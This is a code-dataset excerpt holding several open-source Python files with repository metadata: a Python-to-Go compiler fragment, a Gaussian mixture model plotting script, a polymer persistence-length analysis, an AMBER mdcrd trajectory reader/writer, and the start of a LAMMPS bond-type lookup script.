self.block.intern(target.attr), value)
elif isinstance(target, ast.Subscript):
assert isinstance(target.ctx, ast.Store)
with self.expr_visitor.visit(target.value) as mapping,\
self.expr_visitor.visit(target.slice) as index:
self.writer.write_checked_call1('πg.SetItem(πF, {}, {}, {})',
mapping.expr, index.expr, value)
else:
msg = 'assignment target not yet implemented: ' + type(target).__name__
raise util.ParseError(target, msg)
def _build_assign_target(self, target, assigns):
if isinstance(target, (ast.Tuple, ast.List)):
children = []
for elt in target.elts:
children.append(self._build_assign_target(elt, assigns))
tmpl = 'πg.TieTarget{Children: []πg.TieTarget{$children}}'
return string.Template(tmpl).substitute(children=', '.join(children))
temp = self.block.alloc_temp()
assigns.append((target, temp))
tmpl = 'πg.TieTarget{Target: &$temp}'
return string.Template(tmpl).substitute(temp=temp.name)
def _import(self, name, index):
"""Returns an expression for a Module object returned from ImportModule.
Args:
name: The fully qualified Python module name, e.g. foo.bar.
index: The element in the list of modules that this expression should
select. E.g. for 'foo.bar', 0 corresponds to the package foo and 1
corresponds to the module bar.
Returns:
A Go expression evaluating to an *Object (upcast from a *Module.)
"""
parts = name.split('.')
code_objs = []
for i in xrange(len(parts)):
package_name = '/'.join(parts[:i + 1])
if package_name != self.block.full_package_name:
package = self.block.add_import(package_name)
code_objs.append('{}.Code'.format(package.alias))
else:
code_objs.append('Code')
mod = self.block.alloc_temp()
with self.block.alloc_temp('[]*πg.Object') as mod_slice:
handles_expr = '[]*πg.Code{' + ', '.join(code_objs) + '}'
self.writer.write_checked_call2(
mod_slice, 'πg.ImportModule(πF, {}, {})',
util.go_str(name), handles_expr)
self.writer.write('{} = {}[{}]'.format(mod.name, mod_slice.expr, index))
return mod
def _import_native(self, name, values):
reflect_package = self.block.add_native_import('reflect')
package_name = name[len(_NATIVE_MODULE_PREFIX):].replace('.', '/')
package = self.block.add_native_import(package_name)
mod = self.block.alloc_temp()
with self.block.alloc_temp('map[string]*πg.Object') as members:
self.writer.write_tmpl('$members = map[string]*πg.Object{}',
members=members.name)
for v in values:
module_attr = v
with self.block.alloc_temp() as wrapped:
if v.startswith(_NATIVE_TYPE_PREFIX):
module_attr = v[len(_NATIVE_TYPE_PREFIX):]
with self.block.alloc_temp(
'{}.{}'.format(package.alias, module_attr)) as type_:
self.writer.write_checked_call2(
wrapped, 'πg.WrapNative(πF, {}.ValueOf({}))',
reflect_package.alias, type_.expr)
self.writer.write('{} = {}.Type().ToObject()'.format(
wrapped.name, wrapped.expr))
else:
self.writer.write_checked_call2(
wrapped, 'πg.WrapNative(πF, {}.ValueOf({}.{}))',
reflect_package.alias, package.alias, v)
self.writer.write('{}[{}] = {}'.format(
members.name, util.go_str(module_attr), wrapped.expr))
self.writer.write_checked_call2(mod, 'πg.ImportNativeModule(πF, {}, {})',
util.go_str(name), members.expr)
return mod
def _tie_target(self, target, value):
if isinstance(target, ast.Name):
self._assign_target(target, value)
return
assigns = []
self.writer.write_checked_call1(
'πg.Tie(πF, {}, {})',
self._build_assign_target(target, assigns), value)
for t, temp in assigns:
self._assign_target(t, temp.expr)
self.block.free_temp(temp)
def _visit_each(self, nodes):
for node in nodes:
self.visit(node)
def _write_except_block(self, label, exc, except_node):
self._write_py_context(except_node.lineno)
self.writer.write_label(label)
if except_node.name:
self.block.bind_var(self.writer, except_node.name.id,
'{}.ToObject()'.format(exc))
self._visit_each(except_node.body)
self.writer.write('πE = nil')
self.writer.write('πF.RestoreExc(nil, nil)')
def _write_except_dispatcher(self, exc, tb, handlers):
"""Outputs a Go code that jumps to the appropriate except handler.
Args:
exc: Go variable holding the current exception.
tb: Go variable holding the current exception's traceback.
handlers: A list of ast.ExceptHandler nodes.
Returns:
A list of Go labels indexes corresponding to the exception handlers.
Raises:
ParseError: Except handlers are in an invalid order.
"""
handler_labels = []
for i, except_node in enumerate(handlers):
handler_labels.append(self.block.genlabel())
if except_node.type:
with self.expr_visitor.visit(except_node.type) as type_,\
self.block.alloc_temp('bool') as is_inst:
self.writer.write_checked_call2(
is_inst, 'πg.IsInstance(πF, {}.ToObject(), {})', exc, type_.expr)
self.writer.write_tmpl(textwrap.dedent("""\
if $is_inst {
\tgoto Label$label
}"""), is_inst=is_inst.expr, label=handler_labels[-1])
else:
# This is a bare except. It should be the last handler.
if i != len(handlers) - 1:
msg = "default 'except:' must be last"
raise util.ParseError(except_node, msg)
self.writer.write('goto Label{}'.format(handler_labels[-1]))
if handlers[-1].type:
# There's no bare except, so the fallback is to re-raise.
self.writer.write(
'πE = πF.Raise({}.ToObject(), nil, {}.ToObject())'.format(exc, tb))
self.writer.write('continue')
return handler_labels
def _write_py_context(self, lineno):
if lineno:
line = self.block.lines[lineno - 1].strip()
self.writer.write('// line {}: {}'.format(lineno, line))
self.writer.write('πF.SetLineno({})'.format(lineno))
|
AlexEKoren/grumpy
|
compiler/stmt.py
|
Python
|
apache-2.0
| 29,002
|
[
"VisIt"
] |
346e560c6db95c2cde8714c8f98c9d641e8620d42d893820262878ec78d5e881
|
# Author: Jake VanderPlas
# License: BSD
# The figure produced by this code is published in the textbook
# "Statistics, Data Mining, and Machine Learning in Astronomy" (2013)
# For more information, see http://astroML.github.com
# To report a bug or issue, use the following forum:
# https://groups.google.com/forum/#!forum/astroml-general
from matplotlib import pyplot as plt
import numpy as np
from sklearn.mixture import GMM
#----------------------------------------------------------------------
# This function adjusts matplotlib settings for a uniform feel in the textbook.
# Note that with usetex=True, fonts are rendered with LaTeX. This may
# result in an error if LaTeX is not installed on your system. In that case,
# you can set usetex to False.
from astroML.plotting import setup_text_plots
setup_text_plots(fontsize=8, usetex=True)
#------------------------------------------------------------
# Set up the dataset.
# We'll use scikit-learn's Gaussian Mixture Model to sample
# data from a mixture of Gaussians. The usual way of using
# this involves fitting the mixture to data: we'll see that
# below. Here we'll set the internal means, covariances,
# and weights by-hand.
np.random.seed(1)
gmm = GMM(3, n_iter=1)
gmm.means_ = np.array([[-1], [0], [3]])
gmm.covars_ = np.array([[1.5], [1], [0.5]]) ** 2
gmm.weights_ = np.array([0.3, 0.5, 0.2])
X = gmm.sample(1000)
#------------------------------------------------------------
# Learn the best-fit GMM models
# Here we'll use GMM in the standard way: the fit() method
# uses an Expectation-Maximization approach to find the best
# mixture of Gaussians for the data
# fit models with 1-10 components
N = np.arange(1, 11)
models = [None for i in range(len(N))]
for i in range(len(N)):
models[i] = GMM(N[i]).fit(X)
# compute the AIC and the BIC
AIC = [m.aic(X) for m in models]
BIC = [m.bic(X) for m in models]
#------------------------------------------------------------
# Plot the results
# We'll use three panels:
# 1) data + best-fit mixture
# 2) AIC and BIC vs number of components
# 3) probability that a point came from each component
fig = plt.figure(figsize=(5, 1.7))
fig.subplots_adjust(left=0.12, right=0.97,
bottom=0.21, top=0.9, wspace=0.5)
# plot 1: data + best-fit mixture
ax = fig.add_subplot(131)
M_best = models[np.argmin(AIC)]
x = np.linspace(-6, 6, 1000)
logprob, responsibilities = M_best.eval(x)
pdf = np.exp(logprob)
pdf_individual = responsibilities * pdf[:, np.newaxis]
ax.hist(X, 30, normed=True, histtype='stepfilled', alpha=0.4)
ax.plot(x, pdf, '-k')
ax.plot(x, pdf_individual, '--k')
ax.text(0.04, 0.96, "Best-fit Mixture",
ha='left', va='top', transform=ax.transAxes)
ax.set_xlabel('$x$')
ax.set_ylabel('$p(x)$')
# plot 2: AIC and BIC
ax = fig.add_subplot(132)
ax.plot(N, AIC, '-k', label='AIC')
ax.plot(N, BIC, '--k', label='BIC')
ax.set_xlabel('n. components')
ax.set_ylabel('information criterion')
ax.legend(loc=2)
# plot 3: posterior probabilities for each component
ax = fig.add_subplot(133)
p = M_best.predict_proba(x)
p = p[:, (1, 0, 2)] # rearrange order so the plot looks better
p = p.cumsum(1).T
ax.fill_between(x, 0, p[0], color='gray', alpha=0.3)
ax.fill_between(x, p[0], p[1], color='gray', alpha=0.5)
ax.fill_between(x, p[1], 1, color='gray', alpha=0.7)
ax.set_xlim(-6, 6)
ax.set_ylim(0, 1)
ax.set_xlabel('$x$')
ax.set_ylabel(r'$p({\rm class}|x)$')
ax.text(-5, 0.3, 'class 1', rotation='vertical')
ax.text(0, 0.5, 'class 2', rotation='vertical')
ax.text(3, 0.3, 'class 3', rotation='vertical')
plt.show()
|
sniemi/EuclidVisibleInstrument
|
sandbox/GaussianMixtureModel.py
|
Python
|
bsd-2-clause
| 3,599
|
[
"Gaussian"
] |
31aae935ec53c129e15eb836dd8877dd700198d24f385b5b1f32b857cfc15ee7
|
# -*- Mode: python; tab-width: 4; indent-tabs-mode:nil; coding:utf-8 -*-
# vim: tabstop=4 expandtab shiftwidth=4 softtabstop=4
#
# MDAnalysis --- http://www.mdanalysis.org
# Copyright (c) 2006-2016 The MDAnalysis Development Team and contributors
# (see the file AUTHORS for the full list of names)
#
# Released under the GNU Public Licence, v2 or any higher version
#
# Please cite your use of MDAnalysis in published work:
#
# R. J. Gowers, M. Linke, J. Barnoud, T. J. E. Reddy, M. N. Melo, S. L. Seyler,
# D. L. Dotson, J. Domanski, S. Buchoux, I. M. Kenney, and O. Beckstein.
# MDAnalysis: A Python package for the rapid analysis of molecular dynamics
# simulations. In S. Benthall and S. Rostrup editors, Proceedings of the 15th
# Python in Science Conference, pages 102-109, Austin, TX, 2016. SciPy.
#
# N. Michaud-Agrawal, E. J. Denning, T. B. Woolf, and O. Beckstein.
# MDAnalysis: A Toolkit for the Analysis of Molecular Dynamics Simulations.
# J. Comput. Chem. 32 (2011), 2319--2327, doi:10.1002/jcc.21787
#
"""
Polymer analysis --- :mod:`MDAnalysis.analysis.polymer`
=======================================================
:Author: Richard J. Gowers
:Year: 2015
:Copyright: GNU Public License v3
This module contains various commonly used tools in analysing polymers.
"""
from __future__ import division, absolute_import
from six.moves import range
import numpy as np
import logging
from .. import NoDataError
from ..lib.distances import calc_bonds
from .base import AnalysisBase
logger = logging.getLogger(__name__)
class PersistenceLength(AnalysisBase):
r"""Calculate the persistence length for polymer chains
The persistence length is the length at which two points on the polymer
chain become decorrelated.
Notes
-----
This analysis requires that the trajectory supports indexing
.. versionadded:: 0.13.0
"""
def __init__(self, atomgroups, **kwargs):
"""Calculate the persistence length for polymer chains
Parameters
----------
atomgroups : list
List of atomgroups. Each atomgroup should represent a single
polymer chain, ordered in the correct order.
start : int, optional
First frame of trajectory to analyse, Default: None becomes 0.
stop : int, optional
Last frame of trajectory to analyse, Default: None becomes
n_frames.
step : int, optional
Frame index to stop analysis. Default: None becomes
n_frames. Iteration stops *before* this frame number.
"""
super(PersistenceLength, self).__init__(
atomgroups[0].universe.trajectory, **kwargs)
self._atomgroups = atomgroups
# Check that all chains are the same length
lens = [len(ag) for ag in atomgroups]
chainlength = len(atomgroups[0])
if not all(l == chainlength for l in lens):
raise ValueError("Not all AtomGroups were the same size")
self._results = np.zeros(chainlength - 1, dtype=np.float32)
def _single_frame(self):
# could optimise this by writing a "self dot array"
# we're only using the upper triangle of np.inner
# function would accept a bunch of coordinates and spit out the
# decorrel for that
n = len(self._atomgroups[0])
for chain in self._atomgroups:
# Vector from each atom to next
vecs = chain.positions[1:] - chain.positions[:-1]
# Normalised to unit vectors
vecs /= np.sqrt((vecs * vecs).sum(axis=1))[:, None]
inner_pr = np.inner(vecs, vecs)
for i in range(n-1):
self._results[:(n-1)-i] += inner_pr[i, i:]
def _conclude(self):
n = len(self._atomgroups[0])
norm = np.linspace(n - 1, 1, n - 1)
norm *= len(self._atomgroups) * self.n_frames
self.results = self._results / norm
self._calc_bond_length()
def _calc_bond_length(self):
"""calculate average bond length"""
bs = []
for ag in self._atomgroups:
pos = ag.positions
b = calc_bonds(pos[:-1], pos[1:]).mean()
bs.append(b)
self.lb = np.mean(bs)
def perform_fit(self):
"""Fit the results to an exponential decay"""
try:
self.results
except AttributeError:
raise NoDataError("Use the run method first")
self.x = np.arange(len(self.results)) * self.lb
self.lp = fit_exponential_decay(self.x, self.results)
self.fit = np.exp(-self.x/self.lp)
def plot(self, ax=None):
"""Oooh fancy"""
import matplotlib.pyplot as plt
if ax is None:
ax = plt.gca()
ax.plot(self.x, self.results, 'ro', label='Result')
ax.plot(self.x, self.fit, label='Fit')
ax.set(xlabel='x', ylabel='C(x)', xlim=[0.0, 40 * self.lb])
ax.legend(loc='best')
return ax
def fit_exponential_decay(x, y):
r"""Fit a function to an exponential decay
.. math:: y = \exp(-x/a)
Parameters
----------
x, y : array_like
The two arrays of data
Returns
-------
a : float
The coefficient *a* for this decay
Notes
-----
This function assumes that data starts at 1.0 and decays to 0.0
Requires scipy
"""
from scipy.optimize import curve_fit
def expfunc(x, a):
return np.exp(-x/a)
a = curve_fit(expfunc, x, y)[0][0]
return a
|
kain88-de/mdanalysis
|
package/MDAnalysis/analysis/polymer.py
|
Python
|
gpl-2.0
| 5,509
|
[
"MDAnalysis"
] |
085605092323885aec24bf368d2c3110e72a4349a5cc535cd6dae3221e6c8c7f
|
##############################################################################
# MDTraj: A Python Library for Loading, Saving, and Manipulating
# Molecular Dynamics Trajectories.
# Copyright 2012-2013 Stanford University and the Authors
#
# Authors: Robert McGibbon
# Contributors:
#
# MDTraj is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as
# published by the Free Software Foundation, either version 2.1
# of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with MDTraj. If not, see <http://www.gnu.org/licenses/>.
##############################################################################
##############################################################################
# Imports
##############################################################################
from __future__ import print_function, division
import os
import itertools
import numpy as np
from mdtraj.utils import ensure_type, cast_indices, in_units_of
from mdtraj.formats.registry import _FormatRegistry
from mdtraj.utils.six import string_types, PY3
from mdtraj.utils.six.moves import xrange
__all__ = ['MDCRDTrajectoryFile', 'load_mdcrd']
##############################################################################
# Classes
##############################################################################
class _EOF(IOError):
pass
@_FormatRegistry.register_loader('.mdcrd')
@_FormatRegistry.register_loader('.crd')
def load_mdcrd(filename, top=None, stride=None, atom_indices=None, frame=None):
"""Load an AMBER mdcrd file.
Parameters
----------
filename : str
String filename of AMBER mdcrd file.
top : {str, Trajectory, Topology}
The BINPOS format does not contain topology information. Pass in either
the path to a pdb file, a trajectory, or a topology to supply this
information.
stride : int, default=None
Only read every stride-th frame
atom_indices : array_like, optional
If not none, then read only a subset of the atoms coordinates from the
file.
frame : int, optional
Use this option to load only a single frame from a trajectory on disk.
If frame is None, the default, the entire trajectory will be loaded.
If supplied, ``stride`` will be ignored.
Returns
-------
trajectory : md.Trajectory
The resulting trajectory, as an md.Trajectory object.
See Also
--------
mdtraj.MDCRDTrajectoryFile : Low level interface to MDCRD files
"""
from mdtraj.core.trajectory import _parse_topology, Trajectory
# we make it not required in the signature, but required here. although this
# is a little wierd, its good because this function is usually called by a
# dispatch from load(), where top comes from **kwargs. So if its not supplied
# we want to give the user an informative error message
if top is None:
raise ValueError('"top" argument is required for load_mdcrd')
if not isinstance(filename, string_types):
raise TypeError('filename must be of type string for load_mdcrd. '
'you supplied %s' % type(filename))
topology = _parse_topology(top)
atom_indices = cast_indices(atom_indices)
with MDCRDTrajectoryFile(filename, topology.n_atoms) as f:
if frame is not None:
f.seek(frame)
n_frames = 1
else:
n_frames = None
return f.read_as_traj(topology, n_frames=n_frames, stride=stride,
atom_indices=atom_indices)
@_FormatRegistry.register_fileobject('.mdcrd')
@_FormatRegistry.register_fileobject('.crd')
class MDCRDTrajectoryFile(object):
"""Interface for reading and writing to an AMBER mdcrd files.
This is a file-like object, that both reading or writing depending
on the `mode` flag. It implements the context manager protocol,
so you can also use it with the python 'with' statement.
The conventional units in the mdcrd file are angstroms. The format only
supports storing the cartesian coordinates and box lengths.
Parameters
----------
filename : str
The filename to open. A path to a file on disk.
n_atoms : int
The number of atoms in the system. This is _required_ when mode == 'r'
and irrelevant when mode == 'w'.
mode : {'r', 'w'}
The mode in which to open the file, either 'r' for read or 'w' for
write.
has_box = 'detect'
Does the mdcrd file contain box length information? This is optional
when mode == 'r' (and irrelevant when mode == 'w'). The presence or
absence of box information can generally be inferred from the file,
but there might be corner cases in which this is not possible,
because of limitations in the mdcrd format.
force_overwrite : bool
If opened in write mode, and a file by the name of `filename` already
exists on disk, should we overwrite it?
"""
distance_unit = 'angstroms'
def __init__(self, filename, n_atoms=None, mode='r', has_box='detect',
force_overwrite=True):
"""Open an AMBER mdcrd file for reading/writing.
"""
self._is_open = False
self._filename = filename
self._n_atoms = n_atoms
self._mode = mode
self._w_has_box = None
self._frame_index = 0
self._has_box = has_box
# track which line we're on. this is not essential, but its useful
# when reporting errors to the user to say what line it occured on.
self._line_counter = 0
if has_box not in [True, False, "detect"]:
raise ValueError('has_box must be one of [True, False, "detect"]')
if mode == 'r':
if n_atoms is None:
raise ValueError('To open a mdcrd file in mode="r", you must '
'supply the number of atoms, "n_atoms"')
if not os.path.exists(filename):
raise IOError("The file '%s' doesn't exist" % filename)
self._fh = open(filename, 'rb')
self._is_open = True
self._fh.readline() # read comment
self._line_counter += 1
elif mode == 'w':
if os.path.exists(filename) and not force_overwrite:
raise IOError("The file '%s' already exists" % filename)
self._fh = open(filename, 'wb')
self._is_open = True
else:
raise ValueError('mode must be one of "r" or "w". '
'you supplied "%s"' % mode)
def close(self):
"""Close the mdcrd file"""
if self._is_open:
self._fh.close()
self._is_open = False
def __del__(self):
self.close()
def __enter__(self):
"Support the context manager protocol"
return self
def __exit__(self, *exc_info):
"Support the context manager protocol"
self.close()
def read_as_traj(self, topology, n_frames=None, stride=None, atom_indices=None):
"""Read a trajectory from a mdcrd file
Parameters
----------
topology : Topology
The system topology
n_frames : int, optional
If positive, then read only the next `n_frames` frames. Otherwise read all
of the frames in the file.
stride : np.ndarray, optional
Read only every stride-th frame.
atom_indices : array_like, optional
If not none, then read only a subset of the atoms coordinates from the
file. This may be slightly slower than the standard read because it required
an extra copy, but will save memory.
Returns
-------
trajectory : Trajectory
A trajectory object containing the loaded portion of the file.
"""
from mdtraj.core.trajectory import Trajectory
if atom_indices is not None:
topology = topology.subset(atom_indices)
initial = int(self._frame_index)
xyz, cell_lengths = self.read(n_frames=n_frames, stride=stride, atom_indices=atom_indices)
if len(xyz) == 0:
return Trajectory(xyz=np.zeros((0, topology.n_atoms, 3)), topology=topology)
in_units_of(xyz, self.distance_unit, Trajectory._distance_unit, inplace=True)
in_units_of(cell_lengths, self.distance_unit, Trajectory._distance_unit, inplace=True)
if cell_lengths is None:
cell_angles = None
else:
# Assume that its a rectilinear box
cell_angles = 90.0 * np.ones_like(cell_lengths)
if stride is None:
stride = 1
time = (stride*np.arange(len(xyz))) + initial
t = Trajectory(xyz=xyz, topology=topology, time=time)
t.unitcell_lengths = cell_lengths
t.unitcell_angles = cell_angles
return t
def read(self, n_frames=None, stride=None, atom_indices=None):
"""Read data from a mdcrd file
Parameters
----------
n_frames : int, None
The number of frames you would like to read from the file.
If None, all of the remaining frames will be loaded.
stride : np.ndarray, optional
Read only every stride-th frame.
atom_indices : array_like, optional
If not none, then read only a subset of the atoms coordinates
from the file.
Returns
-------
xyz : np.ndarray, shape=(n_frames, n_atoms, 3), dtype=np.float32
The cartesian coordinates, in angstroms
cell_lengths : {np.ndarray, None}
If the file contains unitcell lengths, they will be returned as an
array of shape=(n_frames, 3). Otherwise, unitcell_angles will be
None.
"""
if not self._mode == 'r':
raise ValueError('read() is only available when file is opened '
'in mode="r"')
if n_frames is None:
frame_counter = itertools.count()
else:
frame_counter = xrange(n_frames)
if stride is None:
stride = 1
coords, boxes = [], []
for i in frame_counter:
try:
coord, box = self._read()
if atom_indices is not None:
coord = coord[atom_indices, :]
except _EOF:
break
coords.append(coord)
boxes.append(box)
for j in range(stride - 1):
# throw away these frames
try:
self._read()
except _EOF:
break
coords = np.array(coords)
if all(b is None for b in boxes):
# if there was no box information in any frame, that's cool
return coords, None
if not all(b is not None for b in boxes):
# but if some of them had box information and others didn't
# that probably means there was a bug in the parsing.
raise IOError('Inconsistent box information. Try manually '
'setting has_box? Your mdcrd file might be '
'corrupt.')
return coords, np.array(boxes, dtype=np.float32)
def _read(self):
"Read a single frame"
i = 0
coords = np.empty(self._n_atoms*3, dtype=np.float32)
box = None
while i < self._n_atoms * 3:
line = self._fh.readline()
self._line_counter += 1
if line == b'':
raise _EOF()
try:
items = [float(line[j:j+8])
for j in range(0, len(line.rstrip()), 8)]
assert 0 < len(items) <= 10
except Exception:
raise IOError('mdcrd parse error on line %d of "%s". This file '
'does not appear to be a valid mdcrd file.' % \
(self._line_counter, self._filename))
length = len(items)
if i + length > len(coords):
raise IOError(
'mdcrd parse error: specified n_atoms (%d) is likely incorrect. '
'Incorrect buffer size encountered on line=%d' % (
self._n_atoms, self._line_counter))
coords[i:i+length] = items
i += length
if i == self._n_atoms * 3:
if self._has_box is False:
break
# peek ahead for box
here = self._fh.tell()
line = self._fh.readline()
peek = [float(elem) for elem in line.strip().split()]
if len(peek) == 3:
box = peek
else:
if self._has_box is True:
raise IOError('Box information not found in file.')
self._fh.seek(-len(line), 1)
self._fh.seek(here)
break
self._frame_index += 1
return coords.reshape(self._n_atoms, 3), box
def write(self, xyz, cell_lengths=None):
"""Write one or more frames of data to a mdcrd file
Parameters
----------
xyz : np.ndarray, shape=(n_frames, n_atoms, 3)
The cartesian coordinates of the atoms to write. By convention, the
lengths should be in units of angstroms.
cell_lengths : np.ndarray, shape=(n_frames, 3), dtype=float32, optional
The length of the periodic box in each frame, in each direction,
`a`, `b`, `c`. By convention the lengths should be in units
of angstroms.
"""
if not self._mode == 'w':
raise ValueError('write() is only available when file is opened '
'in mode="w"')
xyz = ensure_type(xyz, np.float32, 3, 'xyz', can_be_none=False,
shape=(None, None, 3), warn_on_cast=False,
add_newaxis_on_deficient_ndim=True)
cell_lengths = ensure_type(cell_lengths, np.float32, 2, 'cell_lengths',
can_be_none=True, shape=(len(xyz), 3), warn_on_cast=False,
add_newaxis_on_deficient_ndim=True)
if self._w_has_box is None:
# this is the first write()
self._n_atoms = xyz.shape[1]
comment = 'TITLE : Created by MDTraj with %d atoms\n' % self._n_atoms
if PY3:
comment = comment.encode('ascii')
self._fh.write(comment)
if cell_lengths is None:
self._w_has_box = False
else:
self._w_has_box = True
elif self._w_has_box is True:
if cell_lengths is None:
raise ValueError('This mdcrd file must contain unitcell '
'information')
elif self._w_has_box is False:
if cell_lengths is not None:
raise ValueError('This mdcrd file must not contain unitcell '
'information')
else:
raise RuntimeError()
for i in range(xyz.shape[0]):
for j, coord in enumerate(xyz[i].reshape(-1)):
lfdone = False
out = "%8.3f" % coord
if len(out) > 8:
raise ValueError('Overflow error')
if PY3:
out = out.encode('ascii')
self._fh.write(out)
if (j+1) % 10 == 0:
self._fh.write(b"\n")
lfdone = True
if not lfdone:
self._fh.write(b"\n")
if cell_lengths is not None:
line = "%8.3f %8.3f %8.3f\n" % tuple(cell_lengths[i])
if PY3:
line = line.encode('ascii')
self._fh.write(line)
def seek(self, offset, whence=0):
"""Move to a new file position
Parameters
----------
offset : int
A number of frames.
whence : {0, 1, 2}
0: offset from start of file, offset should be >=0.
1: move relative to the current position, positive or negative
2: move relative to the end of file, offset should be <= 0.
Seeking beyond the end of a file is not supported
"""
if self._mode == 'r':
advance, absolute = None, None
if whence == 0 and offset >= 0:
if offset >= self._frame_index:
advance = offset - self._frame_index
else:
absolute = offset
elif whence == 1 and offset >= 0:
advance = offset
elif whence == 1 and offset < 0:
absolute = offset + self._frame_index
elif whence == 2 and offset <= 0:
raise NotImplementedError('offsets from the end are not supported yet')
else:
raise IOError('Invalid argument')
if advance is not None:
for i in range(advance):
self._read() # advance and throw away these frames
elif absolute is not None:
self._fh.close()
self._fh = open(self._filename, 'rb')
self._fh.readline() # read comment
self._frame_index = 0
self._line_counter = 1
for i in range(absolute):
self._read()
else:
raise RuntimeError()
else:
raise NotImplementedError('offsets in write mode are not supported yet')
def tell(self):
"""Current file position
Returns
-------
offset : int
The current frame in the file.
"""
return int(self._frame_index)
def __len__(self):
"Number of frames in the file"
raise NotImplementedError()
|
casawa/mdtraj
|
mdtraj/formats/mdcrd.py
|
Python
|
lgpl-2.1
| 18,394
|
[
"Amber",
"MDTraj"
] |
6e734626b347df330c9daeee0cbb7937537be02dc4cddf23b998957dd261fca3
|
#!/usr/bin/env python
# Author: Andrew Jewett (jewett.aij at g mail)
# License: MIT License (See LICENSE.md)
# Copyright (c) 2013
"""
bonds_by_type.py reads a LAMMPS data file (or an excerpt of a LAMMPS)
data file containing bonded many-body interactions by atom type
(and bond type), and generates a list of additional interactions
in LAMMPS format consistent with those type (to the standard out).
Typical Usage:
bonds_by_type.py -atoms atoms.data \\
-bonds bonds.data \\
-bondsbytype bonds_by_type.data \\
> new_bonds.data
"""
g_program_name = __file__.split('/')[-1] # = 'bonds_by_type.py'
g_date_str = '2016-12-21'
g_version_str = '0.12.0'
import sys
try:
from . import ttree_lex
from .lttree_styles import AtomStyle2ColNames, ColNames2AidAtypeMolid
except (ImportError, SystemError, ValueError):
# not installed as a package
import ttree_lex
from lttree_styles import AtomStyle2ColNames, ColNames2AidAtypeMolid
def LookupBondTypes(bond_types,
bond_ids,
bond_pairs,
lines_atoms,
lines_bonds,
lines_bondsbytype,
atom_style,
section_name,
prefix='',
suffix='',
bond_ids_offset=0):
# report_progress = False):
"""
LookupBondTypes() looks up bond types.
Output:
...It looks up the corresponding type of each bond and store it in the
"bond_types" list. (If the bond_ids were not specified by the user,
generate them and store them in the bond_ids list.)
Input (continued):
This function requires:
...a list of bonded pairs of atoms
stored in the lines_bonds variable (from the "Data Bond List"
or "Data Bonds AtomId AtomId" sections)
...and a list of atom types
stored in the lines_atoms variable (from the "Data Atoms" section)
...and a list of bond-types-as-a-function-of-atom-types
stored in the lines_bondsbytype (from the "Data Bonds By Type" section)
Generated bond_ids (if applicable) are of the form
prefix + str(number) + suffix
(where "number" begins at bond_ids_offset+1)
"""
column_names = AtomStyle2ColNames(atom_style)
i_atomid, i_atomtype, i_molid = ColNames2AidAtypeMolid(column_names)
atomids = []
atomtypes = []
atomids2types = {}
for iv in range(0, len(lines_atoms)):
line = lines_atoms[iv].strip()
if '#' in line:
icomment = line.find('#')
line = (line[:icomment]).strip()
if len(line) > 0:
tokens = ttree_lex.SplitQuotedString(line)
if ((len(tokens) <= i_atomid) or (len(tokens) <= i_atomtype)):
sys.stderr.write("\"" + line + "\"\n")
raise(ttree_lex.InputError(
'Error not enough columns on line ' + str(iv + 1) + ' of \"Atoms\" section.'))
tokens = ttree_lex.SplitQuotedString(line)
atomid = ttree_lex.EscCharStrToChar(tokens[i_atomid])
atomids.append(atomid)
atomtype = ttree_lex.EscCharStrToChar(tokens[i_atomtype])
atomtypes.append(atomtype)
atomids2types[atomid] = atomtype
assert(isinstance(bond_ids, list))
assert(isinstance(bond_types, list))
assert(isinstance(bond_pairs, list))
del bond_ids[:]
del bond_types[:]
del bond_pairs[:]
for ie in range(0, len(lines_bonds)):
line = lines_bonds[ie].strip()
if '#' in line:
icomment = line.find('#')
line = (line[:icomment]).strip()
if len(line) == 0:
continue
tokens = ttree_lex.SplitQuotedString(line)
if section_name == "Data Bonds AtomId AtomId":
if len(tokens) == 2:
bondid_n = bond_ids_offset + len(bond_ids) + 1
bond_ids.append(prefix + str(bondid_n) + suffix)
bond_pairs.append((ttree_lex.EscCharStrToChar(tokens[0]),
ttree_lex.EscCharStrToChar(tokens[1])))
else:
raise(ttree_lex.InputError('Incorrect number of columns on line ' +
str(ie + 1) + ' of \"' + section_name + '\" section.'))
elif section_name == "Data Bond List":
if len(tokens) == 3:
bond_ids.append(ttree_lex.EscCharStrToChar(tokens[0]))
bond_pairs.append((ttree_lex.EscCharStrToChar(tokens[1]),
ttree_lex.EscCharStrToChar(tokens[2])))
else:
raise(ttree_lex.InputError('Incorrect number of columns on line ' +
str(ie + 1) + ' of \"' + section_name + '\" section.'))
else:
raise(ttree_lex.InputError('Internal Error (' + g_program_name +
'): Unknown section name: \"' + section_name + '\"'))
assert(len(bond_types) == 0)
typepattern_to_coefftypes = []
for i in range(0, len(lines_bondsbytype)):
line = lines_bondsbytype[i].strip()
if '#' in line:
icomment = line.find('#')
line = (line[:icomment]).strip()
if len(line) > 0:
tokens = ttree_lex.SplitQuotedString(line)
if (len(tokens) != 3):
raise(ttree_lex.InputError('Error: Wrong number of columns in the \"Bonds By Type\" section of data file.\n'
'Offending line:\n' +
'\"' + line + '\"\n'
'Expected 3 columns\n'))
coefftype = ttree_lex.EscCharStrToChar(tokens[0])
typepattern = []
for typestr in tokens[1:]:
if ((len(typestr) >= 2) and
(typestr[0] == '/') and (typestr[-1] == '/')):
regex_str = typestr[1:-1]
typepattern.append(re.compile(regex_str))
else:
typepattern.append(ttree_lex.EscCharStrToChar(typestr))
typepattern_to_coefftypes.append([typepattern, coefftype])
assert(len(bond_ids) == len(bond_pairs))
for ie in range(0, len(bond_ids)):
bond_types.append(None)
for ie in range(0, len(bond_ids)):
bondid = bond_ids[ie]
(atomid1, atomid2) = bond_pairs[ie]
if atomid1 not in atomids2types:
raise ttree_lex.InputError('Error: atom \"' + atomid1 + '\" not defined in \"Data Atoms\".\n'
' This usually happens when the user mistypes one of the names of the\n'
' $atoms in either a \"Data Atoms\" or \"Data Bond List\" section.\n'
' To find out where the mistake occured, search the \n'
' \"ttree_assignments.txt\" file for:\n'
' \"' + atomid1 + '\"\n')
if atomid2 not in atomids2types:
raise ttree_lex.InputError('Error: atom \"' + atomid2 + '\" not defined in \"Data Atoms\".\n'
' This usually happens when the user mistypes one of the names of the\n'
' $atoms in either a \"Data Atoms\" or \"Data Bond List\" section.\n'
